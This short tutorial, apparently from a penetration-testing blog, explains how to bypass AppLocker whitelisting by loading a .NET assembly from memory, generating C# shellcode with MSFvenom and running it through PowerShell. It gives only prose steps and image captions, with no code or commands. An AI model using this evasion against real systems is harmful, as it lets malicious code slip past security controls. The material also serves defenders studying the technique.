It is possible in an environment that AppLocker is enabled to run an executable due to the way that assemblies are loaded in .NET applications. This bypass method was discovered by Casey Smith and it was presented in ShmooCon 2015. The Assembly Load method is able to call a file from three different locations:

Memory // Byte[]

Location on the disk

From a URL

The .NET assembly originally is loaded with Read permissions in order to enumerate the methods and properties associated with the binary and then permissions are changed to Execute so AppLocker or any whitelisting application cannot identify that something was executed on the system.

Bypassing AppLocker with this method consists of three steps:

Generate C# ShellCode

Compile the .NET application

Execute ShellCode from Memory with Assembly Load

Metasploit MSFvenom can be used to generate C# shellcode:

C# Shellcode Generation

The Shellcode above can be injected into the C# file which then can be compiled by the csc utility which is part of the .NET framework in order to generate the executable.

Running the executable directly or from Powershell will fail since this binary is not whitelisted with an AppLocker rule.

AppLocker Rule – Block Executables

AppLocker Rule – Block ShellCode Binary

However it is possible to bypass this restriction by using the loading assembly method in PowerShell in order to execute the ShellCode which is inside the file and it is defined as a method directly from memory.